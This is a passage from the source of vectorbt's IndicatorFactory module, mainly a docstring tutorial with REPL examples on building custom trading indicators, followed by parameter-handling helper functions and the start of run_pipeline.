>>> MyInd.run(
... price,
... window=2,
... lower=3,
... upper=5
... ).output
custom_window 2
custom_lower 3
custom_upper 5
a b
2020-01-01 NaN NaN
2020-01-02 NaN NaN
2020-01-03 0.0 1.0
2020-01-04 0.0 1.0
2020-01-05 1.0 0.0
```
Multiple parameter combinations:
```python-repl
>>> MyInd.run(
... price,
... window=[2, 3],
... lower=3,
... upper=5
... ).output
custom_window 2 3
custom_lower 3 3
custom_upper 5 5
a b a b
2020-01-01 NaN NaN NaN NaN
2020-01-02 NaN NaN NaN NaN
2020-01-03 0.0 1.0 NaN NaN
2020-01-04 0.0 1.0 0.0 1.0
2020-01-05 1.0 0.0 0.0 0.0
```
Product of parameter combinations:
```python-repl
>>> MyInd.run(
... price,
... window=[2, 3],
... lower=[3, 4],
... upper=5,
... param_product=True
... ).output
custom_window 2 3
custom_lower 3 4 3 4
custom_upper 5 5 5 5
a b a b a b a b
2020-01-01 NaN NaN NaN NaN NaN NaN NaN NaN
2020-01-02 NaN NaN NaN NaN NaN NaN NaN NaN
2020-01-03 0.0 1.0 0.0 1.0 NaN NaN NaN NaN
2020-01-04 0.0 1.0 0.0 0.0 0.0 1.0 0.0 0.0
2020-01-05 1.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
```
Multiple parameter combinations, one per column:
```python-repl
>>> MyInd.run(
... price,
... window=[2, 3],
... lower=[3, 4],
... upper=5,
... per_column=True
... ).output
custom_window 2 3
custom_lower 3 4
custom_upper 5 5
a b
2020-01-01 NaN NaN
2020-01-02 NaN NaN
2020-01-03 0.0 NaN
2020-01-04 0.0 0.0
2020-01-05 1.0 0.0
```
Parameter defaults can be passed directly to the `IndicatorFactory.from_custom_func` and
`IndicatorFactory.from_apply_func`, and overriden in the run method:
```python-repl
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... param_names=['window', 'lower', 'upper'],
... output_names=['output']
... ).from_apply_func(apply_func_nb, window=2, lower=3, upper=4)
>>> MyInd.run(price, upper=5).output
custom_window 2
custom_lower 3
custom_upper 5
a b
2020-01-01 NaN NaN
2020-01-02 NaN NaN
2020-01-03 0.0 1.0
2020-01-04 0.0 1.0
2020-01-05 1.0 0.0
```
Some parameters are meant to be defined per row, column, or element of the input.
By default, if we pass the parameter value as an array, the indicator will treat this array
as a list of multiple values - one per input. To make the indicator view this array as a single
value, set the flag `is_array_like` to True in `param_settings`. Also, to automatically broadcast
the passed scalar/array to the input shape, set `bc_to_input` to True, 0 (index axis), or 1 (column axis).
In our example, the parameter `window` can broadcast per column, and both parameters
`lower` and `upper` can broadcast per element:
```python-repl
>>> @njit
... def apply_func_nb(price, window, lower, upper):
... output = np.full(price.shape, np.nan, dtype=np.float_)
... for col in range(price.shape[1]):
... for i in range(window[col], price.shape[0]):
... mean = np.mean(price[i - window[col]:i, col])
... output[i, col] = lower[i, col] < mean < upper[i, col]
... return output
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... param_names=['window', 'lower', 'upper'],
... output_names=['output']
... ).from_apply_func(
... apply_func_nb,
... param_settings=dict(
... window=dict(is_array_like=True, bc_to_input=1, per_column=True),
... lower=dict(is_array_like=True, bc_to_input=True),
... upper=dict(is_array_like=True, bc_to_input=True)
... )
... )
>>> MyInd.run(
... price,
... window=[np.array([2, 3]), np.array([3, 4])],
... lower=np.array([1, 2]),
... upper=np.array([3, 4]),
... ).output
custom_window 2 3 4
custom_lower array_0 array_0 array_1 array_1
custom_upper array_0 array_0 array_1 array_1
a b a b
2020-01-01 NaN NaN NaN NaN
2020-01-02 NaN NaN NaN NaN
2020-01-03 1.0 NaN NaN NaN
2020-01-04 1.0 0.0 1.0 NaN
2020-01-05 0.0 1.0 0.0 1.0
```
Broadcasting a huge number of parameters to the input shape can consume lots of memory,
especially when the array materializes. Luckily, vectorbt implements flexible broadcasting,
which preserves the original dimensions of the parameter. This requires two changes:
setting `keep_raw` to True in `broadcast_kwargs` and passing `flex_2d` to the apply function.
There are two configs in `vectorbt.indicators.configs` exactly for this purpose: one for column-wise
broadcasting and one for element-wise broadcasting:
```python-repl
>>> from vectorbt.base.reshape_fns import flex_select_auto_nb
>>> from vectorbt.indicators.configs import flex_col_param_config, flex_elem_param_config
>>> @njit
... def apply_func_nb(price, window, lower, upper, flex_2d):
... output = np.full(price.shape, np.nan, dtype=np.float_)
... for col in range(price.shape[1]):
... _window = flex_select_auto_nb(0, col, window, flex_2d)
... for i in range(_window, price.shape[0]):
... _lower = flex_select_auto_nb(i, col, lower, flex_2d)
... _upper = flex_select_auto_nb(i, col, upper, flex_2d)
... mean = np.mean(price[i - _window:i, col])
... output[i, col] = _lower < mean < _upper
... return output
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... param_names=['window', 'lower', 'upper'],
... output_names=['output']
... ).from_apply_func(
... apply_func_nb,
... param_settings=dict(
... window=flex_col_param_config,
... lower=flex_elem_param_config,
... upper=flex_elem_param_config
... ),
... pass_flex_2d=True
... )
```
Both bound parameters can now be passed as a scalar (value per whole input), a 1-dimensional
array (value per row or column, depending upon whether input is a Series or a DataFrame),
a 2-dimensional array (value per element), or a list of any of those. This allows for the
highest parameter flexibility at the lowest memory cost.
For example, let's build a grid of two parameter combinations, each being one window size per column
and both bounds per element:
```python-repl
>>> MyInd.run(
... price,
... window=[np.array([2, 3]), np.array([3, 4])],
... lower=price.values - 3,
... upper=price.values + 3,
... ).output
custom_window 2 3 4
custom_lower array_0 array_0 array_1 array_1
custom_upper array_0 array_0 array_1 array_1
a b a b
2020-01-01 NaN NaN NaN NaN
2020-01-02 NaN NaN NaN NaN
2020-01-03 1.0 NaN NaN NaN
2020-01-04 1.0 1.0 1.0 NaN
2020-01-05 1.0 1.0 1.0 1.0
```
Indicators can also be parameterless. See `vectorbt.indicators.basic.OBV`.
## Inputs
`IndicatorFactory` supports passing none, one, or multiple inputs. If multiple inputs are passed,
it tries to broadcast them into a single shape.
Remember that in vectorbt each column means a separate backtest instance. That's why in order to use
multiple pieces of information, such as open, high, low, close, and volume, we need to provide
them as separate pandas objects rather than a single DataFrame.
Let's create a parameterless indicator that measures the position of the close price within each bar:
```python-repl
>>> @njit
... def apply_func_nb(high, low, close):
... return (close - low) / (high - low)
>>> MyInd = vbt.IndicatorFactory(
... input_names=['high', 'low', 'close'],
... output_names=['output']
... ).from_apply_func(apply_func_nb)
>>> MyInd.run(price + 1, price - 1, price).output
a b
2020-01-01 0.5 0.5
2020-01-02 0.5 0.5
2020-01-03 0.5 0.5
2020-01-04 0.5 0.5
2020-01-05 0.5 0.5
```
To demonstrate broadcasting, let's pass high as a DataFrame, low as a Series, and close as a scalar:
```python-repl
>>> df = pd.DataFrame(np.random.uniform(1, 2, size=(5, 2)))
>>> sr = pd.Series(np.random.uniform(0, 1, size=5))
>>> MyInd.run(df, sr, 1).output
0 1
0 0.960680 0.666820
1 0.400646 0.528456
2 0.093467 0.134777
3 0.037210 0.102411
4 0.529012 0.652602
```
By default, if a Series was passed, it's automatically expanded into a 2-dimensional array.
To keep it as 1-dimensional, set `to_2d` to False.
Similar to parameters, we can also define defaults for inputs. In addition to using scalars
and arrays as default values, we can reference other inputs:
```python-repl
>>> @njit
... def apply_func_nb(ts1, ts2, ts3):
... return ts1 + ts2 + ts3
>>> MyInd = vbt.IndicatorFactory(
... input_names=['ts1', 'ts2', 'ts3'],
... output_names=['output']
... ).from_apply_func(apply_func_nb, ts2='ts1', ts3='ts1')
>>> MyInd.run(price).output
a b
2020-01-01 3.0 15.0
2020-01-02 6.0 12.0
2020-01-03 9.0 9.0
2020-01-04 12.0 6.0
2020-01-05 15.0 3.0
>>> MyInd.run(price, ts2=price * 2).output
a b
2020-01-01 4.0 20.0
2020-01-02 8.0 16.0
2020-01-03 12.0 12.0
2020-01-04 16.0 8.0
2020-01-05 20.0 4.0
```
What if an indicator doesn't take any input arrays? In that case, we can force the user to
at least provide the input shape. Let's define a generator that emulates random returns and
generates synthetic price:
```python-repl
>>> @njit
... def apply_func_nb(input_shape, start, mu, sigma):
... rand_returns = np.random.normal(mu, sigma, input_shape)
... return start * vbt.nb.cumprod_nb(rand_returns + 1)
>>> MyInd = vbt.IndicatorFactory(
... param_names=['start', 'mu', 'sigma'],
... output_names=['output']
... ).from_apply_func(
... apply_func_nb,
... require_input_shape=True,
... seed=42
... )
>>> MyInd.run(price.shape, 100, 0, 0.01).output
custom_start 100
custom_mu 0
custom_sigma 0.01 0.01
0 100.496714 99.861736
1 101.147620 101.382660
2 100.910779 101.145285
3 102.504375 101.921510
4 102.023143 102.474495
```
We can also supply pandas meta such as `input_index` and `input_columns` to the run method:
```python-repl
>>> MyInd.run(
... price.shape, 100, 0, 0.01,
... input_index=price.index, input_columns=price.columns
... ).output
custom_start 100
custom_mu 0
custom_sigma 0.01 0.01
a b
2020-01-01 100.496714 99.861736
2020-01-02 101.147620 101.382660
2020-01-03 100.910779 101.145285
2020-01-04 102.504375 101.921510
2020-01-05 102.023143 102.474495
```
One can even build input-less indicator that decides on the output shape dynamically:
```python-repl
>>> from vectorbt.base.combine_fns import apply_and_concat_one
>>> def apply_func(i, ps, input_shape):
... out = np.full(input_shape, 0)
... out[:ps[i]] = 1
... return out
>>> def custom_func(ps):
... input_shape = (np.max(ps),)
... return apply_and_concat_one(len(ps), apply_func, ps, input_shape)
>>> MyInd = vbt.IndicatorFactory(
... param_names=['p'],
... output_names=['output']
... ).from_custom_func(custom_func)
>>> MyInd.run([1, 2, 3, 4, 5]).output
custom_p 1 2 3 4 5
0 1 1 1 1 1
1 0 1 1 1 1
2 0 0 1 1 1
3 0 0 0 1 1
4 0 0 0 0 1
```
## Outputs
There are two types of outputs: regular and in-place outputs:
* Regular outputs are one or more arrays returned by the function. Each should have an exact
same shape and match the number of columns in the input multiplied by the number of parameter values.
* In-place outputs are not returned but modified in-place. They broadcast together with inputs
and are passed to the calculation function as a list, one per parameter.
Two regular outputs:
```python-repl
>>> @njit
... def apply_func_nb(price):
... return price - 1, price + 1
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... output_names=['out1', 'out2']
... ).from_apply_func(apply_func_nb)
>>> myind = MyInd.run(price)
>>> pd.testing.assert_frame_equal(myind.out1, myind.price - 1)
>>> pd.testing.assert_frame_equal(myind.out2, myind.price + 1)
```
One regular output and one in-place output:
```python-repl
>>> @njit
... def apply_func_nb(price, in_out2):
... in_out2[:] = price + 1
... return price - 1
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... output_names=['out1'],
... in_output_names=['in_out2']
... ).from_apply_func(apply_func_nb)
>>> myind = MyInd.run(price)
>>> pd.testing.assert_frame_equal(myind.out1, myind.price - 1)
>>> pd.testing.assert_frame_equal(myind.in_out2, myind.price + 1)
```
Two in-place outputs:
```python-repl
>>> @njit
... def apply_func_nb(price, in_out1, in_out2):
... in_out1[:] = price - 1
... in_out2[:] = price + 1
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... in_output_names=['in_out1', 'in_out2']
... ).from_apply_func(apply_func_nb)
>>> myind = MyInd.run(price)
>>> pd.testing.assert_frame_equal(myind.in_out1, myind.price - 1)
>>> pd.testing.assert_frame_equal(myind.in_out2, myind.price + 1)
```
By default, in-place outputs are created as empty arrays with uninitialized values.
This allows creation of optional outputs that, if not written, do not occupy much memory.
Since not all outputs are meant to be of data type `float`, we can pass `dtype` in the `in_output_settings`.
```python-repl
>>> @njit
... def apply_func_nb(price, in_out):
... in_out[:] = price > np.mean(price)
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... in_output_names=['in_out']
... ).from_apply_func(
... apply_func_nb,
... in_output_settings=dict(in_out=dict(dtype=bool))
... )
>>> MyInd.run(price).in_out
a b
2020-01-01 False True
2020-01-02 False True
2020-01-03 False False
2020-01-04 True False
2020-01-05 True False
```
Another advantage of in-place outputs is that we can provide their initial state:
```python-repl
>>> @njit
... def apply_func_nb(price, in_out1, in_out2):
... in_out1[:] = in_out1 + price
... in_out2[:] = in_out2 + price
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... in_output_names=['in_out1', 'in_out2']
... ).from_apply_func(
... apply_func_nb,
... in_out1=100,
... in_out2='price'
... )
>>> myind = MyInd.run(price)
>>> myind.in_out1
a b
2020-01-01 101 105
2020-01-02 102 104
2020-01-03 103 103
2020-01-04 104 102
2020-01-05 105 101
>>> myind.in_out2
a b
2020-01-01 2.0 10.0
2020-01-02 4.0 8.0
2020-01-03 6.0 6.0
2020-01-04 8.0 4.0
2020-01-05 10.0 2.0
```
## Without Numba
It's also possible to supply a function that is not Numba-compiled. This is handy when working with
third-party libraries (see the implementation of `IndicatorFactory.from_talib`). Additionally,
we can set `keep_pd` to True to pass all inputs as pandas objects instead of raw NumPy arrays.
!!! note
Already broadcasted pandas meta will be provided; that is, each input array will have the
same index and columns.
Let's demonstrate this by wrapping a basic composed [pandas_ta](https://github.com/twopirllc/pandas-ta) strategy:
```python-repl
>>> import pandas_ta as ta
>>> def apply_func(open, high, low, close, volume, ema_len, linreg_len):
... df = pd.DataFrame(dict(open=open, high=high, low=low, close=close, volume=volume))
... df.ta.strategy(ta.Strategy("MyStrategy", [
... dict(kind='ema', length=ema_len),
... dict(kind='linreg', close='EMA_' + str(ema_len), length=linreg_len)
... ]))
... return tuple([df.iloc[:, i] for i in range(5, len(df.columns))])
>>> MyInd = vbt.IndicatorFactory(
... input_names=['open', 'high', 'low', 'close', 'volume'],
... param_names=['ema_len', 'linreg_len'],
... output_names=['ema', 'ema_linreg']
... ).from_apply_func(
... apply_func,
... keep_pd=True,
... to_2d=False
... )
>>> my_ind = MyInd.run(
... ohlcv['Open'],
... ohlcv['High'],
... ohlcv['Low'],
... ohlcv['Close'],
... ohlcv['Volume'],
... ema_len=5,
... linreg_len=[8, 9, 10]
... )
>>> my_ind.ema_linreg
custom_ema_len 5
custom_linreg_len 8 9 10
date
2021-02-02 NaN NaN NaN
2021-02-03 NaN NaN NaN
2021-02-04 NaN NaN NaN
2021-02-05 NaN NaN NaN
2021-02-06 NaN NaN NaN
... ... ... ...
2021-02-25 52309.302811 52602.005326 52899.576568
2021-02-26 50797.264793 51224.188381 51590.825690
2021-02-28 49217.904905 49589.546052 50066.206828
2021-03-01 48316.305403 48553.540713 48911.701664
2021-03-02 47984.395969 47956.885953 48150.929668
```
In the example above, only one Series per open, high, low, close, and volume can be passed.
To enable the indicator to process two-dimensional data, set `to_2d` to True and create a loop
over each column in the `apply_func`.
!!! hint
Writing a native Numba-compiled code may provide a performance that is magnitudes higher
than that offered by libraries that work on pandas.
## Raw outputs and caching
`IndicatorFactory` re-uses calculation artifacts whenever possible. Since it was originally designed
for hyperparameter optimization and there are times when parameter values gets repeated,
prevention of processing the same parameter over and over again is inevitable for good performance.
For instance, when the `run_combs` method is being used and `speedup` is set to True, it first calculates
the raw outputs of all unique parameter combinations and then uses them to build outputs for
the whole parameter grid.
Let's first take a look at a typical raw output by setting `return_raw` to True:
```python-repl
>>> raw = vbt.MA.run(price, 2, [False, True], return_raw=True)
>>> raw
([array([[ nan, nan, nan, nan],
[1.5 , 4.5 , 1.66666667, 4.33333333],
[2.5 , 3.5 , 2.55555556, 3.44444444],
[3.5 , 2.5 , 3.51851852, 2.48148148],
[4.5 , 1.5 , 4.50617284, 1.49382716]])],
[(2, False), (2, True)],
2,
[])
```
It consists of a list of the returned output arrays, a list of the zipped parameter combinations,
the number of input columns, and other objects returned along with output arrays but not listed
in `output_names`. The next time we decide to run the indicator on a subset of the parameters above,
we can simply pass this tuple as the `use_raw` argument. This won't call the calculation function and
will throw an error if some of the requested parameter combinations cannot be found in `raw`.
```python-repl
>>> vbt.MA.run(price, 2, True, use_raw=raw).ma
ma_window 2
ma_ewm True
a b
2020-01-01 NaN NaN
2020-01-02 1.666667 4.333333
2020-01-03 2.555556 3.444444
2020-01-04 3.518519 2.481481
2020-01-05 4.506173 1.493827
```
Here is how the performance compares when repeatedly running the same parameter combination
with and without speedup:
```python-repl
>>> a = np.random.uniform(size=(1000,))
>>> %timeit vbt.MA.run(a, np.full(1000, 2), speedup=False)
73.4 ms ± 4.76 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)
>>> %timeit vbt.MA.run(a, np.full(1000, 2), speedup=True)
8.99 ms ± 114 µs per loop (mean ± std. dev. of 7 runs, 100 loops each)
```
!!! note
`speedup` is disabled by default.
Enable `speedup` if input arrays have few columns and there are tons of repeated parameter combinations.
Disable `speedup` if input arrays are very wide, if two identical parameter combinations can lead to
different results, or when requesting raw output, cache, or additional outputs outside of `output_names`.
Another performance enhancement can be introduced by caching, which has to be implemented by the user.
The class method `IndicatorFactory.from_apply_func` has an argument `cache_func`, which is called
prior to the main calculation.
Consider the following scenario: we want to compute the relative distance between two expensive
rolling windows. We have already decided on the value for the first window, and want to test
thousands of values for the second window. Without caching, and even with `speedup` enabled,
the first rolling window will be re-calculated over and over again and waste our resources:
```python-repl
>>> @njit
... def roll_mean_expensive_nb(price, w):
... for i in range(100):
... out = vbt.nb.rolling_mean_nb(price, w)
... return out
>>> @njit
... def apply_func_nb(price, w1, w2):
... roll_mean1 = roll_mean_expensive_nb(price, w1)
... roll_mean2 = roll_mean_expensive_nb(price, w2)
... return (roll_mean2 - roll_mean1) / roll_mean1
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... param_names=['w1', 'w2'],
... output_names=['output'],
... ).from_apply_func(apply_func_nb)
>>> MyInd.run(price, 2, 3).output
custom_w1 2
custom_w2 3
a b
2020-01-01 NaN NaN
2020-01-02 NaN NaN
2020-01-03 -0.200000 0.142857
2020-01-04 -0.142857 0.200000
2020-01-05 -0.111111 0.333333
>>> %timeit MyInd.run(price, 2, np.arange(2, 1000))
264 ms ± 3.22 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)
```
To avoid this, let's cache all unique rolling windows:
```python-repl
>>> @njit
... def cache_func_nb(price, ws1, ws2):
... cache_dict = dict()
... ws = ws1.copy()
... ws.extend(ws2)
... for i in range(len(ws)):
... h = hash((ws[i]))
... if h not in cache_dict:
... cache_dict[h] = roll_mean_expensive_nb(price, ws[i])
... return cache_dict
>>> @njit
... def apply_func_nb(price, w1, w2, cache_dict):
... return (cache_dict[hash(w2)] - cache_dict[hash(w1)]) / cache_dict[hash(w1)]
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... param_names=['w1', 'w2'],
... output_names=['output'],
... ).from_apply_func(apply_func_nb, cache_func=cache_func_nb)
>>> MyInd.run(price, 2, 3).output
custom_w1 2
custom_w2 3
a b
2020-01-01 NaN NaN
2020-01-02 NaN NaN
2020-01-03 -0.200000 0.142857
2020-01-04 -0.142857 0.200000
2020-01-05 -0.111111 0.333333
>>> %timeit MyInd.run(price, 2, np.arange(2, 1000))
145 ms ± 4.55 ms per loop (mean ± std. dev. of 7 runs, 10 loops each)
```
We have cut down the processing time almost in half.
Similar to raw outputs, we can force `IndicatorFactory` to return the cache, so it can be used
in other calculations or even indicators. The clear advantage of this approach is that we don't
rely on some fixed set of parameter combinations anymore, but on the values of each parameter,
which gives us more granularity in managing performance.
```python-repl
>>> cache = MyInd.run(price, 2, np.arange(2, 1000), return_cache=True)
>>> %timeit MyInd.run(price, np.arange(2, 1000), np.arange(2, 1000), use_cache=cache)
30.1 ms ± 2 ms per loop (mean ± std. dev. of 7 runs, 10 loops each)
```
## Custom properties and methods
Use `custom_output_props` argument when constructing an indicator to define lazy outputs -
outputs that are processed only when explicitly called. They will become cached properties
and, in contrast to regular outputs, they can have an arbitrary shape. For example, let's
attach a property that will calculate the distance between the moving average and the price.
```python-repl
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... param_names=['window'],
... output_names=['ma'],
... custom_output_props=dict(distance=lambda self: (self.price - self.ma) / self.ma)
... ).from_apply_func(vbt.nb.rolling_mean_nb)
>>> MyInd.run(price, [2, 3]).distance
custom_window 2 3
a b a b
2020-01-01 NaN NaN NaN NaN
2020-01-02 0.333333 -0.111111 NaN NaN
2020-01-03 0.200000 -0.142857 0.500000 -0.250000
2020-01-04 0.142857 -0.200000 0.333333 -0.333333
2020-01-05 0.111111 -0.333333 0.250000 -0.500000
```
Another way of defining own properties and methods is subclassing:
```python-repl
>>> class MyIndExtended(MyInd):
... def plot(self, column=None, **kwargs):
... self_col = self.select_series(column=column, group_by=False)
... return self.ma.vbt.plot(**kwargs)
>>> MyIndExtended.run(price, [2, 3])[(2, 'a')].plot()
```

## Helper properties and methods
For all in `input_names`, `in_output_names`, `output_names`, and `custom_output_props`,
`IndicatorFactory` will create a bunch of comparison and combination methods, such as for generating signals.
What kind of methods are created can be regulated using `dtype` in the `attr_settings` dictionary.
```python-repl
>>> from collections import namedtuple
>>> MyEnum = namedtuple('MyEnum', ['one', 'two'])(0, 1)
>>> def apply_func_nb(price):
... out_float = np.empty(price.shape, dtype=np.float_)
... out_bool = np.empty(price.shape, dtype=np.bool_)
... out_enum = np.empty(price.shape, dtype=np.int_)
... return out_float, out_bool, out_enum
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... output_names=['out_float', 'out_bool', 'out_enum'],
... attr_settings=dict(
... out_float=dict(dtype=np.float_),
... out_bool=dict(dtype=np.bool_),
... out_enum=dict(dtype=MyEnum)
... )).from_apply_func(apply_func_nb)
>>> myind = MyInd.run(price)
>>> dir(myind)
[
...
'out_bool',
'out_bool_and',
'out_bool_or',
'out_bool_xor',
'out_enum',
'out_enum_readable',
'out_float',
'out_float_above',
'out_float_below',
'out_float_equal',
...
'price',
'price_above',
'price_below',
'price_equal',
...
]
```
Each of these methods and properties are created for sheer convenience: to easily combine
boolean arrays using logical rules and to compare numeric arrays. All operations are done
strictly using NumPy. Another advantage is utilization of vectorbt's own broadcasting, such
that one can combine inputs and outputs with an arbitrary array-like object, given their
shapes can broadcast together.
We can also do comparison with multiple objects at once by passing them as a tuple/list:
```python-repl
>>> myind.price_above([1.5, 2.5])
custom_price_above 1.5 2.5
a b a b
2020-01-01 False True False True
2020-01-02 True True False True
2020-01-03 True True True True
2020-01-04 True True True False
2020-01-05 True False True False
```
## Indexing
`IndicatorFactory` attaches pandas indexing to the indicator class thanks to
`vectorbt.base.array_wrapper.ArrayWrapper`. Supported are `iloc`, `loc`,
`*param_name*_loc`, `xs`, and `__getitem__`.
This makes possible accessing rows and columns by labels, integer positions, and parameters.
```python-repl
>>> ma = vbt.MA.run(price, [2, 3])
>>> ma[(2, 'b')]
<vectorbt.indicators.basic.MA at 0x7fe4d10ddcc0>
>>> ma[(2, 'b')].ma
2020-01-01 NaN
2020-01-02 4.5
2020-01-03 3.5
2020-01-04 2.5
2020-01-05 1.5
Name: (2, b), dtype: float64
>>> ma.window_loc[2].ma
a b
2020-01-01 NaN NaN
2020-01-02 1.5 4.5
2020-01-03 2.5 3.5
2020-01-04 3.5 2.5
2020-01-05 4.5 1.5
```
## TA-Lib
Indicator factory also provides a class method `IndicatorFactory.from_talib`
that can be used to wrap any function from TA-Lib. It automatically fills all the
neccessary information, such as input, parameter and output names.
"""
import numpy as np
import pandas as pd
from numba import njit
from numba.typed import List
import itertools
import inspect
from collections import OrderedDict
import warnings
from vectorbt.utils import checks
from vectorbt.utils.decorators import classproperty, cached_property
from vectorbt.utils.config import merge_dicts
from vectorbt.utils.random import set_seed
from vectorbt.utils.params import (
to_typed_list,
broadcast_params,
create_param_product,
DefaultParam
)
from vectorbt.utils.enum import convert_str_enum_value
from vectorbt.base import index_fns, reshape_fns, combine_fns
from vectorbt.base.indexing import ParamIndexerFactory
from vectorbt.base.array_wrapper import ArrayWrapper, Wrapping
def params_to_list(params, is_tuple, is_array_like):
"""Cast parameters to a list."""
check_against = [list, List]
if not is_tuple:
check_against.append(tuple)
if not is_array_like:
check_against.append(np.ndarray)
check_against = tuple(check_against)
if isinstance(params, check_against):
new_params = list(params)
else:
new_params = [params]
return new_params
def prepare_params(param_list, param_settings, input_shape=None, to_2d=False):
"""Prepare parameters."""
new_param_list = []
for i, params in enumerate(param_list):
_param_settings = param_settings if isinstance(param_settings, dict) else param_settings[i]
is_tuple = _param_settings.get('is_tuple', False)
dtype = _param_settings.get('dtype', None)
if checks.is_namedtuple(dtype):
params = convert_str_enum_value(dtype, params)
is_array_like = _param_settings.get('is_array_like', False)
bc_to_input = _param_settings.get('bc_to_input', False)
broadcast_kwargs = _param_settings.get('broadcast_kwargs', dict(require_kwargs=dict(requirements='W')))
new_params = params_to_list(params, is_tuple, is_array_like)
if bc_to_input is not False:
# Broadcast to input or its axis
if is_tuple:
raise ValueError("Tuples cannot be broadcast to input")
if input_shape is None:
raise ValueError("Cannot broadcast to input if input shape is unknown. Pass input_shape.")
if bc_to_input is True:
to_shape = input_shape
else:
checks.assert_in(bc_to_input, (0, 1))
# Note that input_shape can be 1D
if bc_to_input == 0:
to_shape = input_shape[0]
else:
to_shape = input_shape[1] if len(input_shape) > 1 else (1,)
_new_params = reshape_fns.broadcast(
*new_params,
to_shape=to_shape,
**broadcast_kwargs
)
if len(new_params) == 1:
_new_params = (_new_params,)
if to_2d and bc_to_input is True:
# If inputs are meant to reshape to 2D, do the same to parameters
# But only to those that fully resemble inputs (= not raw)
__new_params = list(_new_params)
for j, param in enumerate(__new_params):
keep_raw = broadcast_kwargs.get('keep_raw', False)
if keep_raw is False or (isinstance(keep_raw, (tuple, list)) and not keep_raw[j]):
__new_params[j] = reshape_fns.to_2d(param)
new_params = __new_params
else:
new_params = _new_params
new_param_list.append(new_params)
return new_param_list
def build_columns(param_list, input_columns, level_names=None, hide_levels=None,
param_settings=None, per_column=False, ignore_default=False, **kwargs):
"""For each parameter in `param_list`, create a new column level with parameter values
and stack it on top of `input_columns`.
Returns a list of parameter indexes and new columns."""
if level_names is not None:
checks.assert_len_equal(param_list, level_names)
if hide_levels is None:
hide_levels = []
if param_settings is None:
param_settings = {}
param_indexes = []
shown_param_indexes = []
for i in range(len(param_list)):
params = param_list[i]
level_name = None
if level_names is not None:
level_name = level_names[i]
if per_column:
param_index = index_fns.index_from_values(params, name=level_name)
else:
_param_settings = param_settings if isinstance(param_settings, dict) else param_settings[i]
_per_column = _param_settings.get('per_column', False)
if _per_column:
param_index = None
for param in params:
bc_param = np.broadcast_to(param, len(input_columns))
_param_index = index_fns.index_from_values(bc_param, name=level_name)
if param_index is None:
param_index = _param_index
else:
param_index = param_index.append(_param_index)
if len(param_index) == 1 and len(input_columns) > 1:
# When using flexible column-wise parameters
param_index = index_fns.repeat_index(
param_index,
len(input_columns),
ignore_default=ignore_default
)
else:
param_index = index_fns.index_from_values(param_list[i], name=level_name)
param_index = index_fns.repeat_index(
param_index,
len(input_columns),
ignore_default=ignore_default
)
param_indexes.append(param_index)
if i not in hide_levels:
shown_param_indexes.append(param_index)
if len(shown_param_indexes) > 0:
if not per_column:
n_param_values = len(param_list[0]) if len(param_list) > 0 else 1
input_columns = index_fns.tile_index(
input_columns,
n_param_values,
ignore_default=ignore_default
)
stacked_columns = index_fns.stack_indexes([*shown_param_indexes, input_columns], **kwargs)
return param_indexes, stacked_columns
return param_indexes, input_columns
def run_pipeline(
num_ret_outputs,
custom_func,
*args,
require_input_shape=False,
input_shape=None,
input_index=None,
input_columns=None,
input_list=None,
in_output_list=None,
in_output_settings=None,
broadcast_kwargs=None,
param_list=None,
param_product=False,
param_settings=None,
speedup=False,
silence_warnings=False,
per_column=False,
pass_col=False,
keep_pd=False,
to_2d=True,
as_lists=False,
pass_input_shape=False,
pass_flex_2d=False,
level_names=None,
hide_levels=None,
stacking_kwargs=None,
return_raw=False,
use_raw=None,
wrapper_kwargs=None,
seed=None,
**kwargs):
"""A pipeline for running an indicator, used by `IndicatorFactory`.
Args:
num_ret_outputs (int): The number of output arrays returned by `custom_func`.
custom_func (callable): A custom calculation function.
See `IndicatorFactory.from_custom_func`.
*args: Arguments passed to the `custom_func`.
require_input_shape (bool): Whether to input shape is required.
Will set `pass_input_shape` to True and raise an error if `input_shape` is None.
input_shape (tuple): Shape to broadcast each input to.
Can be passed to `custom_func`. See `pass_input_shape`.
input_index (any): Sets index of each input.
Can be used to label index if no inputs passed.
input_columns (any): Sets columns of each input.
Can be used to label columns if no inputs passed.
input_list (list of array_like): A list of input arrays.
in_output_list (list of array_like): A list of in-place output arrays.
If an array should be generated, pass None.
in_output_settings (dict or list of dict): Settings corresponding to each in-place output.
Following keys are accepted:
* `dtype`: Create this array using this data type and `np.empty`. Default is None.
broadcast_kwargs (dict): Keyword arguments passed to `vectorbt.base.reshape_fns.broadcast`
to broadcast inputs.
param_list (list of array_like): A list of parameters.
Each element is either an array-like object or a single value of any type.
param_product (bool): Whether to build a Cartesian product out of all parameters.
param_settings (dict or list of dict): Settings corresponding to each parameter.
Following keys are accepted:
* `dtype`: If data type is enumerated type and a string as parameter value was passed,
will convert it to integer first.
* `is_tuple`: If tuple was passed, it will be considered as a single value.
To treat it as multiple values, pack it into a list.
* `is_array_like`: If array-like object was passed, it will be considered as a single value.
To treat it as multiple values, pack it into a list.
* `bc_to_input`: Whether to broadcast parameter to input size. You can also broadcast
parameter to an axis by passing an integer.
* `broadcast_kwargs`: Keyword arguments passed to `vectorbt.base.reshape_fns.broadcast`.
* `per_column`: Whether each parameter value can be split per column such that it can
be better reflected in a multi-index. Does not affect broadcasting.
speedup (bool): Whether to run only on unique parameter combinations.
Disable if two identical parameter combinations can lead to different results
(e.g., due to randomness) or if inputs are large and `custom_func` is fast.
!!! note
Cache, raw output, and output objects outside of `num_ret_outputs` will be returned
for unique parameter combinations only.
silence_warnings (bool): Whether to hide warnings such as coming from `speedup`.
per_column (bool): Whether to split the DataFrame into Series, one per column, and run `custom_func`
on each Series.
Each list of parameter values will be broadcast to the number of columns and
each parameter value will be applied per Series rather than per DataFrame.
